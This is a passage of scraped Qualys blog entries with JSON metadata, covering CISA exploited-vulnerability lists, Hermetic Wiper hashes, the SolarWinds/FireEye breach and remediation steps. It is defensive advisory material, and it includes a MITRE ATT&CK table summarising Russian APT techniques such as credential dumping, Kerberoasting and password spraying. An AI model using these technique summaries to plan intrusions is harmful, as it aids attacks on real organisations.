signatures.\n\n\n\nFor devices missing antivirus or anti-malware, [Qualys Multi-Vector EDR](<https://www.qualys.com/apps/endpoint-detection-response/>) with Integrated Anti-Malware can be easily enabled wherever the Qualys Cloud Agent is installed to provide immediate threat protection. In addition to basic anti-malware protection, Multi-Vector EDR will monitor endpoint activity to identify suspicious and malicious activity that usually bypasses traditional antivirus such as Living-off-the-Land attacks as well as MITRE ATT&CK tactics and techniques.\n\n### Step 2: Detect, Prioritize and Remediate CISA's Catalog of Known Exploited Vulnerabilities\n\nQualys Researcher analyzed all the 300+ CVEs from CISA known exploited vulnerabilities and mapped them to the Qualys QIDs. Many of these CVEs have patches available for the past several years. A new \u201cCISA Exploited\u201d RTI was added to VMDR to help customers create vulnerabilities reports that are focused on CISA exploited vulnerabilities. Customers can use the VMDR vulnerabilities page or VMDR prioritization page and filter the results to focus on all the \u201cCISA Exploited\u201d open vulnerabilities in their environment. \n\nFollowing are some of the critical vulnerabilities cataloged by CISA, as specifically known to be exploited by Russian state-sponsored APT actors for initial access include:\n\n**CVE**| **QID**| **Title**| **Release Date**| **CVSS_V3** \n---|---|---|---|--- \nCVE-2018-13379| 43702| Fortinet Fortigate (FortiOS) System File Leak through Secure Sockets Layer (SSL) Virtual Private Network (VPN) via Specially Crafted Hypertext Transfer Protocol (HTTP) Resource Requests (FG-IR-18-384)| 9/12/2019| 9.8 \nCVE-2019-2725| 87386| Oracle WebLogic Server Remote Code Execution Vulnerability (Oracle Security Alert Advisory - CVE-2019-2725)| 4/27/2019| 9.8 \nCVE-2019-7609| 371687| Kibana Multiple Security Vulnerabilities (ESA-2019-01,ESA-2019-02,ESA-2019-03)| 4/18/2019| 10 \nCVE-2019-10149| 50092| Exim Remote Command Execution Vulnerability| 6/5/2019| 9.8 \nCVE-2019-11510| 38771| Pulse Connect Secure Multiple Security Vulnerabilities (SA44101)| 8/6/2019| 10 \nCVE-2019-19781| 372305| Citrix ADC And Citrix Gateway Arbitrary Code Execution Vulnerability(CTX267027)| 12/23/2019| 9.8 \nCVE-2020-0688| 50098| Microsoft Exchange Server Security Update for February 2020| 2/12/2020| 9.8 \nCVE-2020-4006| 13215| VMware Workspace One Access Command Injection Vulnerability (VMSA-2020-0027)| 12/7/2020| 9.1 \nCVE-2020-5902| 38791| F5 BIG-IP ASM,LTM,APM TMUI Remote Code Execution Vulnerability (K52145254) (unauthenticated check)| 7/5/2020| 9.8 \nCVE-2020-14882| 87431| Oracle WebLogic Server Multiple Vulnerabilities (CPUOCT2020)| 10/21/2020| 9.8 \nCVE-2021-26855, CVE-2021- 26857 CVE-2021-26858, CVE-2021-27065 | 50107| Microsoft Exchange Server Remote Code Execution Vulnerability (ProxyLogon)| 3/3/2021| 9.8 \n \nSee the full list of [CISA known exploited vulnerabilities](<https://www.cisa.gov/known-exploited-vulnerabilities-catalog>).\n\n#### Remediate CISA recommended catalog of exploited vulnerabilities \n\nFor all CISA cataloged vulnerabilities known to be exploited by Russian state-sponsored actors, [Qualys Patch Management](<https://www.qualys.com/apps/patch-management/>) customers can create a patch and configuration fix jobs to remediate the risk of all vulnerabilities directly from the VMDR console. Qualys Patch Management maps \u201cCISA Exploited\u201d vulnerabilities detected in the environment to the relevant patches required to remediate those vulnerabilities by downloading the patches without needing to go through the VPN. Customers may use Zero Touch patching to automate the process and ensure all CISA exploited vulnerabilities are automatically fixed including the new vulnerabilities added to the CISA catalog in the future. \n\n\n\n#### Monitor and ensure your software are always up to date\n\nImmediately know all end-of-support critical components across your environment, including open-source software. Qualys CSAM tracks lifecycle stages and corresponding support status, to help organizations manage their technical debt and to reduce the risk of not receiving security patches from the vendor. Security and IT teams can work together to plan upgrades ahead of time by knowing upcoming end-of-life & end-of-support dates.\n\n\n\nUse the \u201cPrioritize Report\u201d function in Qualys Patch Management to map software in your environment to the security risk opposed. Prioritize your remediation efforts based on software that introduces the most risk. Use this report to create automated patch jobs to ensure that the riskiest software is always up to date. Alternatively, deploy individual patches for the riskiest software. \n\n\n\n### Step 3: Protect Your Cloud Services and Office 365\n\nAs noted by CISA, misconfiguration of cloud services and SaaS applications like Office 365 are the primary attack vector for breaches.\n\n#### Detect and Remediate Public Cloud Infrastructure Misconfigurations****\n\nProtect your public cloud infrastructure by securing the following services on priority:\n\n * **IAM**: Ensure all users are MFA enabled and rotate all access keys older than 30 days. Verify that all service accounts are valid (i.e. in use) and have the minimum privilege.\n * **Audit Logs**: Turn on access logging for all cloud management events and for critical services (e.g. S3, RDS, etc.)\n * **Public-facing assets**: Validate that the firewall rules for public-facing assets allow only the needed ports. Pay special attention to RDP access. Place any system with an open RDP port behind a firewall and require users to use a VPN to access it through the firewall.\n\n Automatically detect and remediate cloud misconfigurations using [Qualys CloudView](<https://www.qualys.com/apps/cloud-security-assessment/>).\n\n\n\n#### Protect your Office 365 and Other SaaS Services****\n\nEnforce multi-factor authentication on all accounts with access to Office 365 tenants. At a minimum, enable MFA for accounts with different admin access rights to the tenant. [Qualys SaaSDR](<https://www.qualys.com/apps/saas-detection-response/>) lists all such accounts on which MFA is disabled. Further, Qualys SaaSDR enables continuous security posture assessment of Office 365 via the CIS (Center for Internet Security) certified policy for Office, along with automated security configuration assessment for Zoom, Salesforce, and Google Workspace. This is based on an analysis of all security weaknesses, critical vulnerabilities, and exploits leveraged by attackers in historical attacks as well as security assessments based on the MITRE ATT&CK framework.\n\n\n\n### Step 4: Continuously Detect any Potential Threats and Attacks \n\nMonitor for increases in suspicious and malicious activities as well as anomalous behavior on all endpoints. With Qualys Multi-Vector EDR, customers can detect Indicators of Compromise (IOC) and MITRE ATT&CK Tactics & Techniques provided by CISA and respond quickly to mitigate the risk by capturing process, file, and network events on the endpoint and correlating them with the latest Threat Intelligence, including new and upcoming Indicators of Compromise (IOC) constantly added by the Qualys Research Team. Anomalous endpoint behavior is detected and identified as MITRE ATT&CK Tactics and Techniques.\n\n\n\nThe Appendix at the bottom of this post contains a list of Indicators of Compromise (IOC) and MITRE ATT&CK Tactics & Techniques being utilized.\n\n## Take Action to Learn More about How to Strengthen Your Defenses\n\nWe encourage you to learn more about how to strengthen your defenses consistent with CISA Shields Up guidelines using Qualys Cloud Platform. Join our webinar, [How to Meet CISA Shields Up Guidelines for Cyberattack Protection](<https://event.on24.com/wcc/r/3684128/0F6FB4010D39461FD4209A3E4EB8E9CD>), on March 3, 2022.\n\nQualys recommends that all organizations, regardless of size, heighten their security posture based on the above actionable steps, to protect critical cyber infrastructure from potential state-sponsored, advanced cyberattacks. Qualys Cloud Platform remains continuously committed to high standards of security and compliance to safeguard customer data. In this amplified threat environment, the entire Qualys team is available to help our customers improve cybersecurity and resilience.\n\n* * *\n\n****Implement CISA\u2019s Shields Up Guidance****\n\n[Try it Now](<https://www.qualys.com/forms/cisa-shields-up-service/>)\n\n* * *\n\n### **Appendix:**\n\n#### CISA catalog of known exploited vulnerabilities by state attackers\n\n**CVE**| **QID**| **Title**| **Release Date**| **CVSS_V3** \n---|---|---|---|--- \nCVE-2018-13379| 43702| Fortinet Fortigate (FortiOS) System File Leak through Secure Sockets Layer (SSL) Virtual Private Network (VPN) via Specially Crafted Hypertext Transfer Protocol (HTTP) Resource Requests (FG-IR-18-384)| 9/12/2019| 9.8 \nCVE-2019-1653| 13405| Cisco Small Business RV320 and RV325 Router Multiple Security Vulnerabilities| 1/29/2019| 7.5 \nCVE-2019-2725| 87386| Oracle WebLogic Server Remote Code Execution Vulnerability (Oracle Security Alert Advisory - CVE-2019-2725)| 4/27/2019| 9.8 \nCVE-2019-7609| 371687| Kibana Multiple Security Vulnerabilities (ESA-2019-01,ESA-2019-02,ESA-2019-03)| 4/18/2019| 10 \nCVE-2019-9670| 375990| Zimbra XML External Entity Injection (XXE) Vulnerability| 8/12/2021| 9.8 \nCVE-2019-10149| 50092| Exim Remote Command Execution Vulnerability| 6/5/2019| 9.8 \nCVE-2019-11510| 38771| Pulse Connect Secure Multiple Security Vulnerabilities (SA44101)| 8/6/2019| 10 \nCVE-2019-19781| 372305| Citrix ADC And Citrix Gateway Arbitrary Code Execution Vulnerability(CTX267027)| 12/23/2019| 9.8 \nCVE-2020-0688| 50098| Microsoft Exchange Server Security Update for February 2020| 2/12/2020| 9.8 \nCVE-2020-4006| 13215| VMware Workspace One Access Command Injection Vulnerability (VMSA-2020-0027)| 12/7/2020| 9.1 \nCVE-2020-5902| 38791| F5 BIG-IP ASM,LTM,APM TMUI Remote Code Execution Vulnerability (K52145254) (unauthenticated check)| 7/5/2020| 9.8 \nCVE-2020-14882| 87431| Oracle WebLogic Server Multiple Vulnerabilities (CPUOCT2020)| 10/21/2020| 9.8 \nCVE-2021-26855, CVE-2021- 26857 CVE-2021-26858, CVE-2021-27065 | 50107| Microsoft Exchange Server Remote Code Execution Vulnerability (ProxyLogon)| 3/3/2021| 9.8 \n \nSee the full list of [CISA known exploited vulnerabilities](<https://www.cisa.gov/known-exploited-vulnerabilities-catalog>).\n\n#### List of IOCs related to Hermetic Wiper aka KillDisk\n\n**SHA256 Hashes** \n--- \n0385eeab00e946a302b24a91dea4187c1210597b8e17cd9e2230450f5ece21da \n06086c1da4590dcc7f1e10a6be3431e1166286a9e7761f2de9de79d7fda9c397 \n095c7fa99dbc1ed7a3422a52cc61044ae4a25f7f5e998cc53de623f49da5da43 \n0db5e5b68dc4b8089197de9c1e345056f45c006b7b487f7d8d57b49ae385bad0 \n1bc44eef75779e3ca1eefb8ff5a64807dbc942b1e4a2672d77b9f6928d292591 \n2c10b2ec0b995b88c27d141d6f7b14d6b8177c52818687e4ff8e6ecf53adf5bf \n34ca75a8c190f20b8a7596afeb255f2228cb2467bd210b2637965b61ac7ea907 \n3c557727953a8f6b4788984464fb77741b821991acbf5e746aebdd02615b1767 \n4dc13bb83a16d4ff9865a51b3e4d24112327c526c1392e14d56f20d6f4eaf382 \n7e154d5be14560b8b2c16969effdb8417559758711b05615513d1c84e56be076 \n923eb77b3c9e11d6c56052318c119c1a22d11ab71675e6b95d05eeb73d1accd6 \n9ef7dbd3da51332a78eff19146d21c82957821e464e8133e9594a07d716d892d \na196c6b8ffcb97ffb276d04f354696e2391311db3841ae16c8c9f56f36a38e92 \nb01e0c6ac0b8bcde145ab7b68cf246deea9402fa7ea3aede7105f7051fe240c1 \nb60c0c04badc8c5defab653c581d57505b3455817b57ee70af74311fa0b65e22 \nb6f2e008967c5527337448d768f2332d14b92de22a1279fd4d91000bb3d4a0fd \nc2d06ad0211c24f36978fe34d25b0018ffc0f22b0c74fd1f915c608bf2cfad15 \nd4e97a18be820a1a3af639c9bca21c5f85a3f49a37275b37fd012faeffcb7c4a \ndcbbae5a1c61dbbbb7dcd6dc5dd1eb1169f5329958d38b58c3fd9384081c9b78 \ne5f3ef69a534260e899a36cec459440dc572388defd8f1d98760d31c700f42d5 \nf50ee030224bf617ba71d88422c25d7e489571bc1aba9e65dc122a45122c9321 \nfd7eacc2f87aceac865b0aa97a50503d44b799f27737e009f91f3c281233c17d \n \n#### List of MITRE ATT&CK TIDs provided by CISA\n\n**Tactic**| **Technique******| **Procedure****** \n---|---|--- \nReconnaissance [[TA0043](<https://attack.mitre.org/versions/v10/tactics/TA0043/>)]| Active Scanning: Vulnerability Scanning [[T1595.002](<https://attack.mitre.org/versions/v10/techniques/T1595/002/>)]| \nRussian state-sponsored APT actors have performed large-scale scans in an attempt to find vulnerable servers. \nPhishing for Information [[T1598](<https://attack.mitre.org/versions/v10/techniques/T1598>)]| Russian state-sponsored APT actors have conducted spearphishing campaigns to gain credentials of target networks. \nResource Development [[TA0042]](<https://attack.mitre.org/versions/v10/tactics/TA0042/>)| Develop Capabilities: Malware [[T1587.001](<https://attack.mitre.org/versions/v10/techniques/T1587/001>)]| Russian state-sponsored APT actors have developed and deployed malware, including ICS-focused destructive malware. \nInitial Access [[TA0001](<https://attack.mitre.org/versions/v10/tactics/TA0001/>)]| Exploit Public Facing Applications [[T1190](<https://attack.mitre.org/versions/v10/techniques/T1190/>)]| Russian state-sponsored APT actors use publicly known vulnerabilities, as well as zero-days, in internet-facing systems to gain access to networks. \nSupply Chain Compromise: Compromise Software Supply Chain [[T1195.002](<https://attack.mitre.org/versions/v10/techniques/T1195/002>)]| Russian state-sponsored APT actors have gained initial access to victim organizations by compromising trusted third-party software. Notable incidents include M.E.Doc accounting software and SolarWinds Orion. \nExecution [[TA0002](<https://attack.mitre.org/versions/v10/tactics/TA0002>)]| Command and Scripting Interpreter: PowerShell [[T1059.003](<https://attack.mitre.org/versions/v10/techniques/T1059/003>)] and Windows Command Shell [[T1059.003](<https://attack.mitre.org/versions/v10/techniques/T1059/003>)]| Russian state-sponsored APT actors have used `cmd.exe` to execute commands on remote machines. They have also used PowerShell to create new tasks on remote machines, identify configuration settings, exfiltrate data, and to execute other commands. \nPersistence [[TA0003](<https://attack.mitre.org/versions/v10/tactics/TA0003>)]| Valid Accounts [[T1078](<https://attack.mitre.org/versions/v10/techniques/T1078/>)]| Russian state-sponsored APT actors have used credentials of existing accounts to maintain persistent, long-term access to compromised networks. \nCredential Access [[TA0006](<https://attack.mitre.org/versions/v10/tactics/TA0006>)]| Brute Force: Password Guessing [[T1110.001](<https://attack.mitre.org/versions/v10/techniques/T1110/001>)] and Password Spraying [[T1110.003](<https://attack.mitre.org/versions/v10/techniques/T1110/003>)]| Russian state-sponsored APT actors have conducted brute-force password guessing and password spraying campaigns. \nOS Credential Dumping: NTDS [[T1003.003](<https://attack.mitre.org/versions/v10/techniques/T1003/003/>)]| Russian state-sponsored APT actors have exfiltrated credentials and exported copies of the Active Directory database `ntds.dit`. \nSteal or Forge Kerberos Tickets: Kerberoasting [[T1558.003](<https://attack.mitre.org/versions/v10/techniques/T1558/003/>)]| Russian state-sponsored APT actors have performed \u201cKerberoasting,\u201d whereby they obtained the Ticket Granting Service (TGS) Tickets for Active Directory Service Principal Names (SPN) for offline cracking. \nCredentials from Password Stores [[T1555](<https://attack.mitre.org/versions/v10/techniques/T1555>)]| Russian state-sponsored APT actors have used previously compromised account credentials to attempt to access Group Managed Service Account (gMSA) passwords. \nExploitation for Credential Access [[T1212](<https://attack.mitre.org/versions/v10/techniques/T1212>)]| Russian state-sponsored APT actors have exploited Windows Netlogon vulnerability [CVE-2020-1472](<https://nvd.nist.gov/vuln/detail/CVE-2020-1472>) to obtain access to Windows Active Directory servers. \nUnsecured Credentials: Private Keys [[T1552.004](<https://attack.mitre.org/versions/v10/techniques/T1552/004>)]| Russian state-sponsored APT actors have obtained private encryption keys from the Active Directory Federation Services (ADFS) container to decrypt corresponding SAML signing certificates. \nCommand and Control [[TA0011](<https://attack.mitre.org/versions/v10/tactics/TA0011/>)]| Proxy: Multi-hop Proxy [[T1090.003](<https://attack.mitre.org/versions/v10/techniques/T1090/003/>)]| Russian state-sponsored APT actors have used virtual private servers (VPSs) to route traffic to targets. The actors often use VPSs with IP addresses in the home country of the victim to hide activity among legitimate user traffic.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2022-02-26T20:20:32", "type": "qualysblog", "title": "Russia-Ukraine Crisis: How to Strengthen Your Security Posture to Protect against Cyber Attack, based on CISA Guidelines", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-13379", "CVE-2019-10149", "CVE-2019-11510", "CVE-2019-1653", "CVE-2019-19781", "CVE-2019-2725", "CVE-2019-7609", "CVE-2019-9670", "CVE-2020-0688", "CVE-2020-1472", "CVE-2020-14882", "CVE-2020-4006", "CVE-2020-5902", "CVE-2021-26855", "CVE-2021-26858", "CVE-2021-27065"], "modified": "2022-02-26T20:20:32", "id": "QUALYSBLOG:01C65083E501A6BAFB08FCDA1D561012", "href": "https://blog.qualys.com/category/vulnerabilities-threat-research", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-08-02T20:34:35", "description": "On July 28, 2021, the U.S. Cybersecurity and Infrastructure Security Agency (CISA) released a [cybersecurity advisory](<https://us-cert.cisa.gov/ncas/alerts/aa21-209a>) detailing the top 30 publicly known vulnerabilities that have been routinely exploited by cyber threat actors in 2020 and 2021. Organizations are advised to prioritize and apply patches or workarounds for these vulnerabilities as soon as possible.\n\nThe advisory states, \u201cIf an organization is unable to update all software shortly after a patch is released, prioritize implementing patches for CVEs that are already known to be exploited or that would be accessible to the largest number of potential attackers (such as internet-facing systems).\u201d\n\nCISA released the advisory in conjunction with the Australian Cyber Security Centre (ACSC), the United Kingdom\u2019s National Cyber Security Centre (NCSC), and the U.S. Federal Bureau of Investigation (FBI).\n\nThe CISA advisory is similar in scope to the October 2020 United States National Security Agency (NSA) [cybersecurity advisory](<https://media.defense.gov/2020/Oct/20/2002519884/-1/-1/0/CSA_CHINESE_EXPLOIT_VULNERABILITIES_UOO179811.PDF>) listing the top 25 known vulnerabilities being actively used by Chinese state-sponsored cyber actors [that security teams can detect and mitigate or remediate](<https://blog.qualys.com/product-tech/2020/10/22/nsa-alert-chinese-state-sponsored-actors-exploit-known-vulnerabilities>) in their infrastructure using Qualys VMDR.\n\n### Top Routinely Exploited Vulnerabilities\n\nHere is the list of top routinely exploited vulnerabilities in 2020 and 2021 along with affected products and associated Qualys VMDR QID(s) for each vulnerability.\n\n**CVE-IDs**| **Affected Products**| **Qualys Detections (QIDs)** \n---|---|--- \nCVE-2021-26855, CVE-2021-26857, CVE-2021-26858, CVE-2021-27065| Microsoft Exchange| 50107, 50108 \nCVE-2021-22893, CVE-2021-22894, CVE-2021-22899, CVE-2021-22900| Pulse Secure| 38838 \nCVE-2021-27101, CVE-2021-27102, CVE-2021-27103, CVE-2021-27104| Accellion| 38830 \nCVE-2021-21985| VMware| 730102, 216261, 216260, 216259 \nCVE-2018-13379, CVE-2020-12812, CVE-2019-5591| Fortinet| 43702, 43769, 43825 \nCVE-2019-19781| Citrix| 150273, 372305, 372685 \nCVE-2019-11510| Pulse| 38771 \nCVE-2018-13379| Fortinet| 43702 \nCVE-2020-5902| F5- Big IP| 38791, 373106 \nCVE-2020-15505| MobileIron| 13998 \nCVE-2017-11882| Microsoft| 110308 \nCVE-2019-11580| Atlassian| 13525 \nCVE-2018-7600| Drupal| 371954, 150218, 277288, 176337, 11942 \nCVE-2019-18935| Telerik| 150299, 372327 \nCVE-2019-0604| Microsoft| 110330 \nCVE-2020-0787| Microsoft| 91609 \nCVE-2020-1472| Netlogon| 91688 \n \n### Detect CISA\u2019s Top Routinely Exploited Vulnerabilities using Qualys VMDR\n\nQualys released several remote and authenticated detections (QIDs) for the vulnerabilities. You can search for these QIDs in VMDR Dashboard using the following QQL query:\n\n__vulnerabilities.vulnerability.cveIds: [_`_CVE-2021-26855`,`CVE-2021-26857`,`CVE-2021-26858`,`CVE-2021-27065`,`CVE-2021-22893`,`CVE-2021-22894`,`CVE-2021-22899`,`CVE-2021-22900`,`CVE-2021-27101`,`CVE-2021-27102`,`CVE-2021-27103`,`CVE-2021-27104`,`CVE-2021-21985`,` CVE-2018-13379`,`CVE-2020-12812`,`CVE-2019-5591`,`CVE-2019-19781`,`CVE-2019-11510`,`CVE-2018-13379`,`CVE-2020-5902`,`CVE-2020-15505`,`CVE-2017-11882`,`CVE-2019-11580`,`CVE-2019-18935`,`CVE-2019-0604`,`CVE-2020-0787`,`CVE-2020-1472`]__\n\n\n\nUsing [Qualys VMDR](<https://www.qualys.com/subscriptions/vmdr/>), customers can effectively prioritize this vulnerability for \u201cActive Attack\u201d RTI:\n\n\n\nWith VMDR Dashboard, you can track top 30 publicly known exploited vulnerabilities, their impacted hosts, their status and overall management in real time. With trending enabled for dashboard widgets, you can keep track of these vulnerabilities trends in your environment using the [\u201cCISA: Alert (AA21-209A) | Top Exploited\u201d dashboard](<https://success.qualys.com/support/s/article/000006738>).\n\n\n\n### Recommendations\n\nAs guided by CISA, one must do the following to protect assets from being exploited:\n\n * Minimize gaps in personnel availability and consistently consume relevant threat intelligence.\n * Organizations\u2019 vigilance team should keep a close eye on indications of compromise (IOCs) as well as strict reporting processes.\n * Regular incident response exercises at the organizational level are always recommended as a proactive approach.\n * Organizations should require multi-factor authentication to remotely access networks from external sources, especially for administrator or privileged accounts.\n * Focus cyber defense resources on patching those vulnerabilities that cyber actors most often use.\n\n### Remediation and Mitigation\n\n * Patch systems and equipment promptly and diligently.\n * Implement rigorous configuration management programs.\n * Disable unnecessary ports, protocols, and services.\n * Enhance monitoring of network and email traffic.\n * Use protection capabilities to stop malicious activity.\n\n### Get Started Now\n\nStart your [_Qualys VMDR trial_](<https://www.qualys.com/subscriptions/vmdr/>) to automatically detect and mitigate or remediate the CISA top 30 publicly known vulnerabilities that have been routinely exploited by cyber threat actors in 2020 and 2021.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2021-07-29T00:20:27", "type": "qualysblog", "title": "CISA Alert: Top Routinely Exploited Vulnerabilities", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-11882", "CVE-2018-13379", "CVE-2018-7600", "CVE-2019-0604", "CVE-2019-11510", "CVE-2019-11580", "CVE-2019-18935", "CVE-2019-19781", "CVE-2019-5591", "CVE-2020-0787", "CVE-2020-12812", "CVE-2020-1472", "CVE-2020-15505", "CVE-2020-5902", "CVE-2021-21985", "CVE-2021-22893", "CVE-2021-22894", "CVE-2021-22899", "CVE-2021-22900", "CVE-2021-26855", "CVE-2021-26857", "CVE-2021-26858", "CVE-2021-27065", "CVE-2021-27101", "CVE-2021-27102", "CVE-2021-27103", "CVE-2021-27104"], "modified": "2021-07-29T00:20:27", "id": "QUALYSBLOG:8DC9B53E981BBE193F6EC369D7FA85F8", "href": "https://blog.qualys.com/category/vulnerabilities-threat-research", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-12-22T22:56:21", "description": "#### **_Qualys Researchers found Millions of devices exposed to vulnerabilities used in the stolen FireEye Red Team tools and SolarWinds Orion by analyzing the anonymized set of vulnerabilities across Qualys\u2019 worldwide customer base_**\n\n##### **_Qualys to offer a free 60-day integrated Vulnerability Management, Detection and Response service to help organizations quickly assess the devices impacted by SolarWinds Orion vulnerabilities, SUNBURST Trojan detections, or FireEye Red Team tools, and to remediate them and track their remediation via dynamic dashboards. Register at <https://www.qualys.com/solarhack/>_**\n\nOn Dec 8, [FireEye disclosed](<https://www.fireeye.com/blog/products-and-services/2020/12/fireeye-shares-details-of-recent-cyber-attack-actions-to-protect-community.html>) the theft of its Red Team assessment tools which leverage over 16 known CVE\u2019s to exploit client environments to test and validate their security posture. [FireEye also confirmed](<https://www.fireeye.com/blog/threat-research/2020/12/evasive-attacker-leverages-solarwinds-supply-chain-compromises-with-sunburst-backdoor.html>) a trojanized version of SolarWinds Orion software was used to facilitate this theft.\n\nAccess to these sophisticated FireEye Red Team tools stolen by the attackers increases the risk of an attack on an organization\u2019s critical infrastructure. Red teams often use a known set of vulnerabilities to exploit and quickly compromise systems to simulate what a real attacker can do in the network. If these tools fall into the wrong hands, it will increase the chances of successfully exploiting the vulnerabilities.\n\n### Why is this security incident so important?\n\nTo underscore the seriousness of this breach, the Department of Homeland Security has issued an [emergency directive](<https://cyber.dhs.gov/ed/21-01/>) ordering all federal agencies to take immediate steps in mitigating the risk of SolarWinds Orion applications and other security vulnerabilities related to the stolen FireEye Red Team tools. They\u2019ve also strongly recommended that commercial organizations adhere to the same guidance.\n\n### 7+ million vulnerable instances open to potential attack across networks of global organizations analyzed by Qualys researchers\n\nThe Qualys Cloud Platform is the most widely used platform for Vulnerability Management by global organizations. Qualys Vulnerability Research Teams continuously investigate vulnerabilities being exploited by attackers. Since the public release of this information by FireEye and SolarWinds, our researchers have analyzed the state of these anonymized vulnerabilities across networks of organizations using Qualys Cloud Platform. While the number of vulnerable instances of SolarWinds Orion are in the hundreds, our analysis has identified over 7.54 million vulnerable instances related to FireEye Red Team tools across 5.29 million unique assets, highlighting the scope of the potential attack surface if these tools are misused. Organizations need to move quickly to immediately protect themselves from being exploited by these vulnerabilities.\n\nThe good news is that patches have been available for these vulnerabilities for some time. Interestingly, further analysis of those 7.54 million vulnerable instances indicated about 7.53 million or roughly 99.84% are from only eight vulnerabilities in Microsoft\u2019s software as listed below. Luckily Microsoft patches have been available for a while.\n\n### List of 8 patchable security vulnerabilities to significantly reduce attack surface\n\n**CVE ID** | **Release Date** | **Name** | **CVSS** | **Qualys QID(s)** \n---|---|---|---|--- \nCVE-2020-1472 | 08/11/2020 | Microsoft Windows Netlogon Elevation of Privilege Vulnerability| 10 | 91668 \nCVE-2019-0604 | 02/12/2019 | Microsoft Office and Microsoft Office Services and Web Apps Security Update February 2019 Microsoft SharePoint| 9.8 | 110330 \nCVE-2019-0708 | 05/14/2019 | Microsoft Windows Remote Desktop Services Remote Code Execution Vulnerability (Blue. Keep)| 9.8 | 91541, 91534 \nCVE-2014-1812 | 05/13/2014 | Microsoft Windows Group Policy Preferences Password Elevation of Privilege Vulnerability (KB2962486)| 9 | 91148, 90951 \nCVE-2020-0688 | 02/11/2020 | Microsoft Exchange Server Security Update for February 2020 | 8.8 | 50098 \nCVE-2016-0167 | 04/12/2016 | Microsoft Windows Graphics Component Security Update (MS16-039)| 7.8 | 91204 \nCVE-2017-11774| 10/10/2017 | Microsoft Office and Microsoft Office Services and Web Apps Security Update October 2017 | 7.8 | 110306 \nCVE-2018-8581 | 11/13/2018 | Microsoft Exchange Server Elevation of Privilege Vulnerability| 7.4 | 53018 \n \n* See the [full list of 16 exploitable vulnerabilities and their patch links](<https://blog.qualys.com/vulnerabilities-research/2020/12/09/theft-of-cybersecurity-tools-fireeye-breach>).\n\n### Recommended action to mitigate the risk immediately\n\nBased on sheer risk and scale of these vulnerabilities, it is imperative for organizations to quickly assess the state of these vulnerabilities and missing patches across all their assets impacted by SolarWinds Orion vulnerabilities, SUNBURST Trojan detections, or FireEye Red Team tools.\n\n * Immediately deploy applicable patches for all above vulnerabilities across the affected assets.\n * Power down SolarWinds Orion products, versions 2019.4 through 2020.2.1 HF1, from the network, until patch - is applied.\n * Apply security hygiene controls for the impacted software and operating system to reduce the impact.\n * Search for existence of the following files:\n * [SolarWinds.Orion.Core.BusinessLayer.dll] with a file hash of [b91ce2fa41029f6955bff20079468448]\n * [C:\\WINDOWS\\SysWOW64\\netsetupsvc.dll]\n\nand other Indications of Compromise, and remove them along with killing the parent processes that touched them.\n\n### Qualys brings free 60-day integrated Vulnerability Management, Detection and Response service to detect and patch these vulnerabilities\n\nTo help global organizations, Qualys is offering a free service for 60 days, to rapidly address this risk. The service enables customers with -\n\n * Real-time, up-to-date inventory and automated organization of all assets, applications, services running across the hybrid-IT environment\n * Continuous view of all critical vulnerabilities and their prioritization based on real-time threat indicators and attack surface\n * Automatic correlation of applicable patches for identified vulnerabilities\n * Patch Deployment via Qualys Cloud Agents with zero impact to VPN bandwidth\n * Security configuration hygiene assessment to apply as compensating controls to reduce vulnerability risk\n * Unified dashboards that consolidate all insights for management visualization via a single pane of glass\n\nIn addition to Qualys VMDR and Patch Management, organizations can also leverage additional capabilities like EDR and FIM to detect additional indicators of compromise such as malicious files, hashes and remove them from their environment.\n\nVMDR prioritization screen with Solorigate SUNBURST RTI selected Qualys Unified Dashboard showing FireEye Red Team tools & Solorigate/SUNBURST risk\n\n### Existing Qualys customers can immediately leverage their accounts to mitigate their exposure for recommended actions\n\n * Inventory the compromised versions of SolarWinds and VMware applications as well as other actively running services, and processes.\n * Detect all applicable vulnerabilities related to Solorigate/SUNBURST, FireEye tools as well as VMware applications along with a prioritized list of appropriate patches to deploy.\n * Immediately deploy prioritized patches for the above critical vulnerabilities. In case a patch cannot be applied immediately, it leverages the compensating controls to reduce the risk impact until patches can be applied.\n * Additionally, it can detect for the evidence of malicious files and IOCs related to SolarWinds applications and FireEye compromised toolsets and remove them.\n\n### Additional resources\n\n * [CISA Emergency Directive 21-01](<https://cyber.dhs.gov/ed/21-01/>)\n * [SolarWinds 